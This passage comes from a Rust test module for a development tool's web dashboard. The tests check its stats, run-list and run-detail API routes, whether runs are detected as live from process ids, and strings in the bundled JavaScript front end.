7865        assert_eq!(bumps["coverage_rate"]["pct"], 100.0);
7866        assert_eq!(bumps["attention_rate"]["pct"], 50.0);
7867    }
7868
7869    #[tokio::test]
7870    async fn stats_release_bumps_rates_are_null_with_nothing_recorded() {
7871        let f = Fixture::start().await;
7872        write_run(&f.runs(), "20260902-140501-a", RunStatus::Merged);
7873
7874        let bumps = f.get("/api/stats").await.json()["release_bumps"].clone();
7875        assert_eq!(bumps["merged"], 1);
7876        assert_eq!(bumps["recorded"], 0);
7877        // `merged` is nonzero, so coverage still reads as a real 0%, not an
7878        // absent rate - "0 of 1 merged runs" is a fact, not a missing value.
7879        assert_eq!(bumps["coverage_rate"]["pct"], 0.0);
7880        // `pr_opened` and `recorded` are both zero here, so these rates have
7881        // no denominator to compute from and must be null.
7882        assert_eq!(bumps["automerge_rate"], Value::Null);
7883        assert_eq!(bumps["attention_rate"], Value::Null);
7884    }
7885
7886    #[tokio::test]
7887    async fn stats_queue_counts_come_from_the_live_queue() {
7888        let f = Fixture::start().await;
7889        let q = f.queue();
7890        let mut queued = Task::new(
7891            "queued task".to_owned(),
7892            "do it".to_owned(),
7893            PathBuf::from("/repo"),
7894            Source::Human,
7895        );
7896        q.put(&mut queued).expect("put queued");
7897        let mut held = Task::new(
7898            "held task".to_owned(),
7899            "do it later".to_owned(),
7900            PathBuf::from("/repo"),
7901            Source::Human,
7902        );
7903        held.hold_machine(Some("out of attempts".to_owned()));
7904        q.put(&mut held).expect("put held");
7905
7906        let queue = f.get("/api/stats").await.json()["queue"].clone();
7907        assert_eq!(queue["queued"], 1);
7908        assert_eq!(queue["held"], 1);
7909        assert_eq!(queue["running"], 0);
7910        assert_eq!(queue["done"], 0);
7911        assert_eq!(queue["failed"], 0);
7912        assert_eq!(queue["blocked"], 0);
7913    }
7914
7915    #[tokio::test]
7916    async fn stats_on_an_empty_home_is_all_zero_not_an_error() {
7917        let f = Fixture::start().await;
7918        let stats = f.get("/api/stats").await;
7919        assert_eq!(stats.status, 200);
7920        assert_eq!(stats.json()["totals"]["runs"], 0);
7921        assert_eq!(stats.json()["totals"]["completion_rate"], Value::Null);
7922        assert_eq!(stats.json()["runs_unreadable"], 0);
7923        assert!(stats.json()["agents"].as_array().unwrap().is_empty());
7924        assert!(stats.json()["advisors"].as_array().unwrap().is_empty());
7925        assert!(stats.json()["repos"].as_array().unwrap().is_empty());
7926        assert_eq!(stats.json()["repo"], Value::Null);
7927    }
7928
7929    #[tokio::test]
7930    async fn stats_lists_every_repository_with_runs_recorded() {
7931        let f = Fixture::start().await;
7932        write_run_repo(
7933            &f.runs(),
7934            "20260902-140501-a",
7935            RunStatus::Merged,
7936            "/repos/a",
7937        );
7938        write_run_repo(
7939            &f.runs(),
7940            "20260902-140502-b",
7941            RunStatus::Merged,
7942            "/repos/a",
7943        );
7944        write_run_repo(
7945            &f.runs(),
7946            "20260902-140503-c",
7947            RunStatus::Blocked,
7948            "/repos/b",
7949        );
7950
7951        let stats = f.get("/api/stats").await;
7952        assert_eq!(stats.status, 200);
7953        // Unfiltered - the aggregate across both repositories.
7954        assert_eq!(stats.json()["totals"]["runs"], 3);
7955        assert_eq!(stats.json()["repo"], Value::Null);
7956
7957        let repos = stats.json()["repos"].clone();
7958        let repos = repos.as_array().unwrap();
7959        assert_eq!(repos.len(), 2);
7960        // Busiest (2 runs) first.
7961        assert_eq!(repos[0]["repo"], "/repos/a");
7962        assert_eq!(repos[0]["name"], "a");
7963        assert_eq!(repos[0]["runs"], 2);
7964        assert_eq!(repos[1]["repo"], "/repos/b");
7965        assert_eq!(repos[1]["runs"], 1);
7966    }
7967
7968    #[tokio::test]
7969    async fn stats_repo_query_narrows_the_aggregate_to_one_repository() {
7970        let f = Fixture::start().await;
7971        write_run_repo(
7972            &f.runs(),
7973            "20260902-140501-a",
7974            RunStatus::Merged,
7975            "/repos/a",
7976        );
7977        write_run_repo(
7978            &f.runs(),
7979            "20260902-140502-b",
7980            RunStatus::Blocked,
7981            "/repos/b",
7982        );
7983
7984        let stats = f.get("/api/stats?repo=%2Frepos%2Fa").await;
7985        assert_eq!(stats.status, 200);
7986        assert_eq!(stats.json()["totals"]["runs"], 1);
7987        assert_eq!(stats.json()["totals"]["merged"], 1);
7988        assert_eq!(stats.json()["repo"], "/repos/a");
7989        // The repository list itself is unaffected by the filter - it is
7990        // what a client switches repositories from.
7991        assert_eq!(stats.json()["repos"].as_array().unwrap().len(), 2);
7992        // runs_unreadable is a whole-workload count, never scoped to the
7993        // selected repository - see StatsView::runs_unreadable's own doc.
7994        assert_eq!(stats.json()["runs_unreadable"], 0);
7995    }
7996
7997    #[tokio::test]
7998    async fn stats_repo_query_for_an_unknown_repo_is_a_404() {
7999        let f = Fixture::start().await;
8000        write_run_repo(
8001            &f.runs(),
8002            "20260902-140501-a",
8003            RunStatus::Merged,
8004            "/repos/a",
8005        );
8006
8007        let stats = f.get("/api/stats?repo=%2Frepos%2Fnope").await;
8008        assert_eq!(stats.status, 404);
8009    }
8010
8011    #[tokio::test]
8012    async fn a_run_is_summarised_for_the_list_and_served_whole_on_its_own_route() {
8013        let f = Fixture::start().await;
8014        write_run(&f.runs(), "20260902-140501-a1b2", RunStatus::Ready);
8015
8016        let summary = f.get("/api/runs").await.json();
8017        let row = &summary[0];
8018        assert_eq!(row["short"], "a1b2");
8019        assert_eq!(row["status"], "ready");
8020        assert_eq!(row["done"], true);
8021        assert_eq!(row["title"], "Add a web UI");
8022        assert_eq!(row["repo_name"], "magi");
8023        assert_eq!(row["judges"], 3);
8024        assert_eq!(row["winner"], Value::Null);
8025        assert_eq!(row["reviews"], 0);
8026
8027        // The short id resolves, and the detail route is the state itself, not
8028        // a projection of it: the UI reads fields the summary does not carry.
8029        let detail = f.get("/api/runs/a1b2").await;
8030        assert_eq!(detail.status, 200);
8031        assert_eq!(detail.json()["base_branch"], "main");
8032        assert_eq!(detail.json()["id"], "20260902-140501-a1b2");
8033    }
8034
8035    /// `status: "ready"` alone cannot tell a run still headed for a landing
8036    /// (a PR closed without merging, say) apart from one `[merge] mode =
8037    /// "none"` left unmerged for good — the confusion the operator flagged
8038    /// after the CLI report already grew a `not landed — nothing to do by
8039    /// design` line for exactly this case (`report.rs`). Both the list route
8040    /// and the detail route must carry a flag the phone can key on instead of
8041    /// re-deriving it from `status` + `merge.mode` itself.
8042    #[tokio::test]
8043    async fn a_mode_none_ready_run_is_flagged_unmerged_by_design_everywhere() {
8044        let f = Fixture::start().await;
8045
8046        let mut none_run = RunState::new(
8047            PathBuf::from("/repo/magi"),
8048            "main".to_owned(),
8049            "0123456789abcdef".to_owned(),
8050            "Add a web UI".to_owned(),
8051            Config::default(),
8052        );
8053        none_run.id = "20260902-140503-none".to_owned();
8054        none_run.status = RunStatus::Ready;
8055        none_run.merge = Some(crate::run::MergeOutcome {
8056            mode: crate::config::MergeMode::None,
8057            ok: true,
8058            detail: "git -C /repo merge --no-ff magi/x/A".to_owned(),
8059        });
8060        write_state(&f.runs(), &none_run);
8061
8062        let mut pr_run = RunState::new(
8063            PathBuf::from("/repo/magi"),
8064            "main".to_owned(),
8065            "0123456789abcdef".to_owned(),
8066            "Add a web UI".to_owned(),
8067            Config::default(),
8068        );
8069        pr_run.id = "20260902-140504-prcl".to_owned();
8070        pr_run.status = RunStatus::Ready;
8071        pr_run.merge = Some(crate::run::MergeOutcome {
8072            mode: crate::config::MergeMode::Pr,
8073            ok: false,
8074            detail: "https://example.com/pr/1 was closed without merging".to_owned(),
8075        });
8076        write_state(&f.runs(), &pr_run);
8077
8078        let summary = f.get("/api/runs").await.json();
8079        let rows: std::collections::HashMap<&str, &Value> = summary
8080            .as_array()
8081            .expect("an array")
8082            .iter()
8083            .map(|r| (r["id"].as_str().expect("an id"), r))
8084            .collect();
8085        assert_eq!(rows[none_run.id.as_str()]["status"], "ready");
8086        assert_eq!(
8087            rows[none_run.id.as_str()]["unmerged_by_design"],
8088            true,
8089            "a mode-none Ready must be flagged in the list"
8090        );
8091        assert_eq!(
8092            rows[pr_run.id.as_str()]["unmerged_by_design"],
8093            false,
8094            "a Ready reached by a closed pull request is a different case"
8095        );
8096
8097        let none_detail = f.get(&format!("/api/runs/{}", none_run.id)).await.json();
8098        assert_eq!(none_detail["status"], "ready");
8099        assert_eq!(none_detail["unmerged_by_design"], true);
8100
8101        let pr_detail = f.get(&format!("/api/runs/{}", pr_run.id)).await.json();
8102        assert_eq!(pr_detail["unmerged_by_design"], false);
8103    }
8104
8105    /// `RunState::active` is only ever cleared by whoever populated it, so the
8106    /// detail route also has to say whether a daemon is actually still
8107    /// driving this run right now — otherwise a seat from a killed process's
8108    /// last wave would read as live forever.
8109    #[tokio::test]
8110    async fn run_detail_reports_active_seats_and_whether_a_daemon_confirms_them() {
8111        let f = Fixture::start().await;
8112        // Matches `write_daemon`'s hard-coded `current.run`, so the second
8113        // half of this test can claim the daemon is working on it without a
8114        // second helper.
8115        let id = "20260902-140502-bbbb";
8116        let mut state = RunState::new(
8117            PathBuf::from("/repo/magi"),
8118            "main".to_owned(),
8119            "0123456789abcdef".to_owned(),
8120            "Add a web UI".to_owned(),
8121            Config::default(),
8122        );
8123        state.id = id.to_owned();
8124        state.status = RunStatus::Judging;
8125        state.seat_started("judge", "judge-2", std::time::Duration::from_secs(120), 0);
8126        let dir = f.runs().join(id);
8127        std::fs::create_dir_all(&dir).expect("run dir");
8128        std::fs::write(
8129            dir.join("run.json"),
8130            serde_json::to_string_pretty(&state).expect("serialize run"),
8131        )
8132        .expect("write run.json");
8133
8134        // No daemon.json at all, and no `driver_pid` recorded either (this
8135        // state was written directly, never through `execute()`): there is
8136        // nothing to confirm either way, so the route must say `"unknown"` —
8137        // never `"dead"`, which is exactly the false diagnosis a manual `magi
8138        // run` used to get from this route before `driver_pid` existed.
8139        let cold = f.get(&format!("/api/runs/{id}")).await.json();
8140        assert_eq!(cold["active"]["judge-2"]["node"], "judge");
8141        assert_eq!(cold["live"], "unknown", "{cold}");
8142
8143        // A fresh heartbeat naming exactly this run: the same entry now reads
8144        // as confirmed, not merely recorded.
8145        write_daemon(f.home.path(), Timestamp::now());
8146        let warm = f.get(&format!("/api/runs/{id}")).await.json();
8147        assert_eq!(warm["live"], "live", "{warm}");
8148    }
8149
8150    /// The gap `driver_pid` exists to close: a manual `magi run` / `magi
8151    /// review` claims no daemon at all, so before this field existed the
8152    /// route above read it as `"dead"` — indistinguishable from a run a
8153    /// killed process abandoned — the whole time it was genuinely still
8154    /// answering. With a live pid recorded, it must read `"live"` even
8155    /// though no daemon claims it.
8156    #[tokio::test]
8157    async fn run_detail_reads_a_manual_run_with_a_live_driver_pid_as_live_without_a_daemon() {
8158        let f = Fixture::start().await;
8159        let id = "20260922-090000-cccc";
8160        let mut state = RunState::new(
8161            PathBuf::from("/repo/magi"),
8162            "main".to_owned(),
8163            "0123456789abcdef".to_owned(),
8164            "Review only".to_owned(),
8165            Config::default(),
8166        );
8167        state.id = id.to_owned();
8168        state.status = RunStatus::Reviewing;
8169        state.seat_started("review", "review-1", std::time::Duration::from_secs(120), 0);
8170        // This test process's own pid: guaranteed alive, and never needs a
8171        // real daemon or a second process to prove it. The matching start-time
8172        // marker is what `liveness` now requires alongside a live pid — see
8173        // `RunState::driver_started_at`'s own doc for why the pid alone is
8174        // not enough.
8175        state.driver_pid = Some(std::process::id());
8176        state.driver_started_at = Some(
8177            crate::proc::process_started_at(std::process::id())
8178                .expect("this test process's own start time must be queryable"),
8179        );
8180        let dir = f.runs().join(id);
8181        std::fs::create_dir_all(&dir).expect("run dir");
8182        std::fs::write(
8183            dir.join("run.json"),
8184            serde_json::to_string_pretty(&state).expect("serialize run"),
8185        )
8186        .expect("write run.json");
8187
8188        let detail = f.get(&format!("/api/runs/{id}")).await.json();
8189        assert_eq!(detail["live"], "live", "{detail}");
8190    }
8191
8192    /// A killed manual run's pid can be handed to a wholly unrelated later
8193    /// process — a live query on `driver_pid` alone would read this as
8194    /// `"live"`, exactly the false positive `driver_started_at` exists to
8195    /// catch (see that field's own doc, and `RunState::liveness_with`'s
8196    /// pid-reuse test). The route must read it as `"dead"`, not `"live"`.
8197    #[tokio::test]
8198    async fn run_detail_reads_a_live_pid_as_dead_once_its_start_time_no_longer_matches() {
8199        let f = Fixture::start().await;
8200        let id = "20260922-090100-dddd";
8201        let mut state = RunState::new(
8202            PathBuf::from("/repo/magi"),
8203            "main".to_owned(),
8204            "0123456789abcdef".to_owned(),
8205            "Review only".to_owned(),
8206            Config::default(),
8207        );
8208        state.id = id.to_owned();
8209        state.status = RunStatus::Reviewing;
8210        state.seat_started("review", "review-1", std::time::Duration::from_secs(120), 0);
8211        // This test process's own pid really is alive, but the marker
8212        // recorded here does not match what it actually started at —
8213        // standing in for the pid having since been reused by a different
8214        // process than the one that wrote `run.json`.
8215        state.driver_pid = Some(std::process::id());
8216        state.driver_started_at = Some("not-this-processes-real-start-time".to_owned());
8217        let dir = f.runs().join(id);
8218        std::fs::create_dir_all(&dir).expect("run dir");
8219        std::fs::write(
8220            dir.join("run.json"),
8221            serde_json::to_string_pretty(&state).expect("serialize run"),
8222        )
8223        .expect("write run.json");
8224
8225        let detail = f.get(&format!("/api/runs/{id}")).await.json();
8226        assert_eq!(detail["live"], "dead", "{detail}");
8227    }
8228
8229    /// The deck's competition list is normally the first place an operator
8230    /// sees an old run. It must carry the same process verdict as detail, or
8231    /// its `reviewing` chip keeps falsely advertising a dead run as in flight.
8232    #[test]
8233    fn summarize_asks_about_each_pid_once_and_keeps_the_row_meaning() {
8234        let mk = |id: &str, pid: Option<u32>| {
8235            let mut s = RunState::new(
8236                PathBuf::from("/repo/magi"),
8237                "main".to_owned(),
8238                "0123456789abcdef".to_owned(),
8239                "Add a web UI".to_owned(),
8240                Config::default(),
8241            );
8242            s.id = id.to_owned();
8243            s.driver_pid = pid;
8244            s.driver_started_at = Some("t0".to_owned());
8245            s
8246        };
8247        let states = vec![
8248            mk("20260902-140502-aaaa", Some(77)),
8249            mk("20260902-140502-bbbb", Some(77)),
8250            mk("20260902-140502-cccc", Some(77)),
8251            mk("20260902-140502-dddd", None),
8252        ];
8253        let open: HashSet<String> = ["20260902-140502-bbbb".to_owned()].into();
8254        let claimed: HashSet<String> = ["20260902-140502-dddd".to_owned()].into();
8255        let sup: HashMap<String, String> = [(
8256            "20260902-140502-aaaa".to_owned(),
8257            "20260902-140502-cccc".to_owned(),
8258        )]
8259        .into();
8260
8261        let status_calls = std::cell::Cell::new(0);
8262        let identity_calls = std::cell::Cell::new(0);
8263        let probe = std::cell::RefCell::new(crate::proc::ProcProbe::new(
8264            |_| {
8265                status_calls.set(status_calls.get() + 1);
8266                Some(true)
8267            },
8268            |_| {
8269                identity_calls.set(identity_calls.get() + 1);
8270                Some("t0".to_owned())
8271            },
8272        ));
8273        let rows = summarize(
8274            states,
8275            &open,
8276            &claimed,
8277            &sup,
8278            |p| probe.borrow_mut().status(p),
8279            |p| probe.borrow_mut().started_at(p),
8280        );
8281
8282        assert_eq!(status_calls.get(), 1, "one pid, one status query");
8283        assert_eq!(identity_calls.get(), 1, "one pid, one identity query");
8284        assert_eq!(rows.len(), 4);
8285        assert!(!rows[0].waiting && rows[1].waiting);
8286        assert_eq!(rows[0].live, crate::run::Liveness::Live);
8287        assert_eq!(rows[3].live, crate::run::Liveness::Live, "claim alone");
8288        assert_eq!(rows[0].superseded_by.as_deref(), Some("cccc"));
8289        assert_eq!(rows[1].superseded_by, None);
8290    }
8291
8292    #[test]
8293    fn run_list_exposes_a_confirmed_dead_driver_for_stale_presentation() {
8294        let mut state = RunState::new(
8295            PathBuf::from("/repo/magi"),
8296            "main".to_owned(),
8297            "0123456789abcdef".to_owned(),
8298            "Review only".to_owned(),
8299            Config::default(),
8300        );
8301        state.id = "20260922-090200-dead".to_owned();
8302        state.status = RunStatus::Reviewing;
8303        let row = serde_json::to_value(RunSummary::of(&state, false, crate::run::Liveness::Dead))
8304            .expect("serialize list row");
8305        assert_eq!(row["status"], "reviewing");
8306        assert_eq!(row["live"], "dead", "{row}");
8307        assert!(!row["done"].as_bool().unwrap());
8308    }
8309
8310    #[tokio::test]
8311    async fn the_run_list_is_newest_first_and_honours_a_limit() {
8312        let f = Fixture::start().await;
8313        for id in [
8314            "20260902-140501-aaaa",
8315            "20260902-140502-bbbb",
8316            "20260902-140503-cccc",
8317        ] {
8318            write_run(&f.runs(), id, RunStatus::Merged);
8319        }
8320
8321        let all = f.get("/api/runs").await.json();
8322        let capped = f.get("/api/runs?limit=2").await.json();
8323
8324        assert_eq!(all[0]["id"], "20260902-140503-cccc");
8325        assert_eq!(all.as_array().map(Vec::len), Some(3));
8326        assert_eq!(capped.as_array().map(Vec::len), Some(2));
8327        assert_eq!(capped[0]["id"], "20260902-140503-cccc");
8328    }
8329
8330    #[tokio::test]
8331    async fn the_report_route_serves_the_terminal_report_as_plain_text() {
8332        let f = Fixture::start().await;
8333        write_run(&f.runs(), "20260902-140501-a1b2", RunStatus::Blocked);
8334
8335        let res = f.get("/api/runs/20260902-140501-a1b2/report").await;
8336
8337        assert_eq!(res.status, 200);
8338        assert!(
8339            res.headers
8340                .contains("content-type: text/plain; charset=utf-8"),
8341            "a browser must render it, not download it: {}",
8342            res.headers
8343        );
8344        // The assertion is on content, not on the absence of escapes: colour
8345        // is a process-global that `serve` turns off at startup, and another
8346        // test in this binary may own it while this one runs.
8347        assert!(
8348            res.body.contains("20260902-140501-a1b2"),
8349            "the report is about the run that was asked for: {}",
8350            res.body
8351        );
8352    }
8353
8354    #[tokio::test]
8355    async fn the_front_end_is_served_from_the_binary_with_types_a_phone_renders() {
8356        let f = Fixture::start().await;
8357
8358        let html = f.get("/").await;
8359        let css = f.get("/app.css").await;
8360        let js = f.get("/app.js").await;
8361
8362        assert_eq!((html.status, css.status, js.status), (200, 200, 200));
8363        assert!(
8364            html.headers
8365                .contains("content-type: text/html; charset=utf-8")
8366        );
8367        assert!(css.headers.contains("content-type: text/css"));
8368        assert!(js.headers.contains("content-type: text/javascript"));
8369        assert_eq!(html.body, INDEX_HTML, "compiled in, never read from disk");
8370    }
8371
8372    #[test]
8373    fn review_rounds_label_a_distinct_verified_head() {
8374        assert!(APP_JS.contains("round.verified_head"));
8375        assert!(APP_JS.contains("verified HEAD"));
8376        assert!(APP_JS.contains("verified ${String(round.verified_head).slice(0, 7)}"));
8377    }
8378
8379    #[test]
8380    fn queue_ui_presents_blocked_dependencies_and_resolved_questions() {
8381        // A blocked task's chip and note must not fall back to a queued-like
8382        // rendering - review 1623 R2-2-1's finding, fixed for the chip table
8383        // itself by e11fc58 but never checked here.
8384        assert!(APP_JS.contains("blocked: { glyph:"));
8385        assert!(APP_JS.contains("Blocked. Waiting on another task or question to resolve."));
8386
8387        // `blocked_by` mixes task ids and question ids in the same list, and
8388        // the client can only tell them apart by checking each id against
8389        // what it actually knows - never by guessing from the id's shape.
8390        assert!(APP_JS.contains("function classifyBlockedBy(blockedBy, tasksById, questionsById)"));
8391        assert!(
8392            APP_JS.contains(
8393                "if (parts.length) noteText = `${noteText} Waiting on ${parts.join(\" and \")}.`;"
8394            ),
8395            "the note line must name what a blocked task is waiting on, not just that it is blocked"
8396        );
8397        // The classification must key off `status_str`, never off `blocked_by`
8398        // or `block_reason` merely being present - both can survive briefly
8399        // on a task a hold or a dead daemon just moved off `blocked`.
8400        assert!(APP_JS.contains("if (status === \"blocked\") {"));
8401
8402        // A question a task is blocked on gets its own node in the same
8403        // dependency graph, not just a task-shaped node with nothing known
8404        // about it.
8405        assert!(APP_JS.contains("function depNode(id, byId, questionNodes)"));
8406        assert!(APP_JS.contains("questionNodes.set(dep, questionsById.get(dep));"));
8407        assert!(
8408            APP_JS.contains("location.hash = \"#/questions\";"),
8409            "a question node must jump to the Questions screen, not pretend to be a task"
8410        );
8411
8412        // `Task::answers` - decisions already made - are shown as a record on
8413        // the card, the same disclosure style as the full instruction.
8414        assert!(APP_JS.contains("Resolved questions"));
8415        assert!(APP_JS.contains("r.answersList.append("));
8416        assert!(APP_CSS.contains(".task-answers"));
8417    }
8418
8419    #[test]
8420    fn a_task_notification_links_to_its_own_card_not_the_bare_backlog() {
8421        // A `kind: "task"` notice link used to drop the id on the floor and
8422        // point at `#/queue` outright, so every task notification landed on
8423        // whatever happened to be first in the Backlog rather than the task
8424        // it was actually about.
8425        assert!(
8426            APP_JS.contains(
8427                "el(\"a\", { href: `#/queue/${encodeURIComponent(link.id)}`, text: `Task ${shortId(link.id)}` })"
8428            ),
8429            "a task notice's link must carry the task id into the hash, not just name the Backlog screen"
8430        );
8431        assert!(
8432            !APP_JS.contains("el(\"a\", { href: \"#/queue\", text: `Task ${shortId(link.id)}` })"),
8433            "regression: the task link must not go back to naming the bare Backlog route"
8434        );
8435
8436        // The route parser has to read that id back out before applyRoute()
8437        // can do anything with it.
8438        assert!(
8439            APP_JS.contains(
8440                "if (parts[0] === \"queue\" && parts[1]) return { name: \"queue\", id: decodeURIComponent(parts[1]) };"
8441            ),
8442            "`#/queue/<id>` must parse into a route carrying that id"
8443        );
8444
8445        // And the Backlog view has to actually land on the card once it can
8446        // - see consumeQueueFocus(), which renderQueue() calls on every pass
8447        // so a focus set before the queue has loaded is retried once it has.
8448        assert!(APP_JS.contains("state.queueFocus = route.id;"));
8449        assert!(APP_JS.contains("function consumeQueueFocus()"));
8450        assert!(APP_JS.contains("jumpToTask(id);"));
8451    }
8452
8453    #[test]
8454    fn consuming_a_queue_focus_survives_clearing_a_stale_backlog_search() {
8455        // consumeQueueFocus() clears an active Backlog search before it can
8456        // scroll to the target card (the sections list is hidden while a
8457        // search is showing), by recursing back into renderQueue(). The
8458        // fixer's first cut nulled state.queueFocus before that recursive
8459        // call, so the second pass saw nothing to jump to and the jump was
8460        // silently dropped whenever a notification's link was opened with a
8461        // stale search still active. state.queueFocus must only be cleared
8462        // right before jumpToTask() actually runs.
8463        assert!(
8464            APP_JS.contains(
8465                "  if (!id || state.queue === null) return;\n  if (state.queueSearch.trim() !== \"\") {"
8466            ),
8467            "the search-clearing branch must run before state.queueFocus is cleared, or the \
8468             recursive renderQueue() call has nothing left to jump to"
8469        );
8470        assert!(
8471            APP_JS.contains("state.queueFocus = null;\n  jumpToTask(id);"),
8472            "state.queueFocus must be cleared immediately before the jump it guards, not earlier"
8473        );
8474    }
8475
8476    #[test]
8477    fn a_notification_card_navigates_from_anywhere_on_it_not_just_its_link_text() {
8478        // The task's own repro: only the link text inside .notice-meta was
8479        // clickable, so a tap on the message, the timestamp, or the card's
8480        // padding did nothing - on a phone that reads as "the card doesn't
8481        // work" even though the tiny link inside it did. Mark read / Dismiss
8482        // must keep working independently of this: `.closest("a, button")`
8483        // is what lets a tap that actually lands on those elements fall
8484        // through instead of being hijacked into a navigation.
8485        assert!(
8486            APP_JS.contains(
8487                "onclick: link ? (event) => { if (!event.target.closest(\"a, button\")) link.click(); } : null"
8488            ),
8489            "the notice card itself must forward a tap outside its link/buttons to the link's own click"
8490        );
8491    }
8492
8493    #[test]
8494    fn review_rounds_tell_a_stale_verification_and_a_resource_block_apart_from_a_real_result() {
8495        assert!(
8496            APP_JS.contains("round.verified_head !== round.head"),
8497            "a round that verified an earlier commit must be visibly distinct from one that \
8498             verified the head reviewers are looking at now"
8499        );
8500        assert!(
8501            APP_JS.contains("round.verified_at"),
8502            "when a check ran must be on the wire, not just which commit"
8503        );
8504        assert!(
8505            APP_JS.contains("resource_blocked"),
8506            "a command magi never got to run (shared build cache contention) must not render \
8507             the same as a command that ran and failed"
8508        );
8509    }
8510
8511    #[test]
8512    fn a_stats_kpi_tile_navigates_to_the_runs_view_pre_filtered_to_its_own_status() {
8513        // Every KPI tile but Total runs and Completion names an exact
8514        // RunStatus and hands it to openRunsFiltered(), which is what wires
8515        // the click into state.runsFilter.status (matchesFilter's own
8516        // status check) rather than the coarser runsStateFilter chips. Each
8517        // status literal here must be one of the strings runSection() (and
8518        // isStale()) actually compare a run's own `status` field against -
8519        // a status this dashboard invented would filter to nothing.
8520        assert!(
8521            APP_JS.contains("onClick: () => openRunsFiltered(status)"),
8522            "every KPI tile built through statusTile() must route its click through \
8523             openRunsFiltered, the single place that sets the Runs filter"
8524        );
8525        for (label, status) in [
8526            ("Merged", "merged"),
8527            ("Ready", "ready"),
8528            ("Blocked", "blocked"),
8529            ("Stalled", "stalled"),
8530        ] {
8531            let call = format!("statusTile(\"{label}\", t.{status}, ");
8532            assert!(
8533                APP_JS.contains(&call),
8534                "expected the {label} KPI tile built via {call}..."
8535            );
8536            assert!(
8537                APP_JS.contains(&format!("status === \"{status}\"")),
8538                "\"{status}\" must be a real RunStatus literal runSection()/isStale() already \
8539                 compare a run against, not one invented only for the stats tile"
8540            );
8541        }
8542        assert!(
8543            APP_JS.contains("function openRunsFiltered(status)"),
8544            "openRunsFiltered must exist as the single place a stats tile sets the Runs filter"
8545        );
8546        assert!(
8547            APP_JS.contains("if (status && String(run.status || \"\") !== status) return false;"),
8548            "matchesFilter must gate on the exact status a KPI tile named"
8549        );
8550        // applyRoute() only flips which view is visible for a plain `#runs`
8551        // hash - it does not itself redraw the list (see applyRoute's own
8552        // handling below) - so openRunsFiltered must call renderRuns()
8553        // itself, and must call applyRoute() too so the view flips even
8554        // when the hash string doesn't change (the operator may already be
8555        // on the Runs view when a tile is tapped, which fires no
8556        // hashchange event at all).
8557        assert!(
8558            APP_JS.contains("  location.hash = \"#runs\";\n  applyRoute();\n  renderRuns();\n}"),
8559            "openRunsFiltered must explicitly re-render the Runs list, not rely on a \
8560             hashchange event that may never fire"
8561        );
8562    }
8563
8564    #[test]
8565    fn selecting_a_run_state_chip_drops_an_incompatible_status_filter() {
8566        // A stats tile can leave state.runsFilter.status set to something
8567        // done-by-construction (e.g. "merged") - picking "Active" afterward
8568        // must drop it the same way an incompatible tree section is already
8569        // dropped, or the Runs list renders permanently empty with no way
8570        // for the operator to tell why.
8571        assert!(APP_JS.contains("function statusCompatibleWithStateFilter(status, filterKey)"));
8572        assert!(
8573            APP_JS.contains(
8574                "  if (state.runsFilter.status && !statusCompatibleWithStateFilter(state.runsFilter.status, key)) {\n    state.runsFilter = { ...state.runsFilter, status: null };\n  }"
8575            ),
8576            "selectRunStateFilter must clear an incompatible status filter, mirroring its own \
8577             guard for an incompatible tree section"
8578        );
8579    }
8580
8581    #[test]
8582    fn every_stats_queue_tile_names_a_real_queue_section() {
8583        // renderStatsQueue()'s tiles each call openQueueSectionFocus() with a
8584        // QUEUE_SECTIONS key; a typo here would silently no-op the tile
8585        // (consumeQueueSectionFocus finds no matching <details> and drops
8586        // the focus) rather than fail loudly, so pin every key against the
8587        // section list it has to resolve against.
8588        assert!(
8589            APP_JS.contains("onClick: () => openQueueSectionFocus(sectionKey)"),
8590            "every queue tile built through sectionTile() must route its click through \
8591             openQueueSectionFocus"
8592        );
8593        for key in ["upnext", "running", "done", "held", "blocked"] {
8594            assert!(
8595                APP_JS.contains(&format!("{{ key: \"{key}\",")),
8596                "QUEUE_SECTIONS must define a \"{key}\" section for a stats tile to reveal"
8597            );
8598        }
8599        // Queued and Failed intentionally both resolve to "upnext" - the
8600        // same section queueSection() itself files them under - rather than
8601        // getting a section each.
8602        for line in [
8603            "sectionTile(\"Queued\", q.queued, \"blue\", \"upnext\"),",
8604            "sectionTile(\"Running\", q.running, \"blue\", \"running\"),",
8605            "sectionTile(\"Done\", q.done, \"gold\", \"done\"),",
8606            "sectionTile(\"Failed\", q.failed, \"rust\", \"upnext\"),",
8607            "sectionTile(\"Held\", q.held, \"rust\", \"held\"),",
8608            "sectionTile(\"Blocked\", q.blocked, \"rust\", \"blocked\"),",
8609        ] {
8610            assert!(APP_JS.contains(line), "expected a stats queue tile: {line}");
8611        }
8612    }
8613
8614    #[test]
8615    fn a_stats_queue_tile_reveals_its_section_without_dropping_a_pending_task_focus() {
8616        // Mirrors consuming_a_queue_focus_survives_clearing_a_stale_backlog_search
8617        // above for the section-focus channel a stats queue tile drives:
8618        // consumeQueueSectionFocus() must leave state.queueSectionFocus set
8619        // through the stale-search-clear recursion into renderQueue(), and
8620        // clear it only once revealQueueSection() is actually about to run -
8621        // the same trap that once silently dropped a task-focus jump.
8622        assert!(APP_JS.contains("function openQueueSectionFocus(sectionKey)"));
8623        assert!(APP_JS.contains("function consumeQueueSectionFocus()"));
8624        assert!(APP_JS.contains("function revealQueueSection(details)"));
8625        assert!(
8626            APP_JS.contains("consumeQueueFocus();\n  consumeQueueSectionFocus();"),
8627            "renderQueue() must consume both focus channels on every pass"
8628        );
8629        assert!(
8630            APP_JS.contains(
8631                "  const key = state.queueSectionFocus;\n  if (!key || state.queue === null) return;\n  if (state.queueSearch.trim() !== \"\") {"
8632            ),
8633            "the search-clearing branch must run before state.queueSectionFocus is cleared, or \
8634             the recursive renderQueue() call has nothing left to reveal"
8635        );
8636        assert!(
8637            APP_JS.contains(
8638                "  const details = document.querySelector(`#queue-sections details.list-section[data-key=\"${CSS.escape(key)}\"]`);\n  state.queueSectionFocus = null;\n  if (details) revealQueueSection(details);"
8639            ),
8640            "state.queueSectionFocus must only be cleared immediately before the reveal it guards"
8641        );
8642        // applyRoute() only calls renderQueue() itself for the `#/queue/<id>`
8643        // task-focus form of the hash - a plain `#queue` navigation only
8644        // flips which view is visible. openQueueSectionFocus() must
8645        // therefore call renderQueue() itself, and applyRoute() too so the
8646        // view flips even when the hash doesn't change (the Backlog may
8647        // already be open when a tile is tapped, firing no hashchange
8648        // event at all).
8649        assert!(
8650            APP_JS.contains("  location.hash = \"#queue\";\n  applyRoute();\n  renderQueue();\n}"),
8651            "openQueueSectionFocus must explicitly re-render the Backlog, not rely on a \
8652             hashchange event that may never fire"
8653        );
8654    }
8655
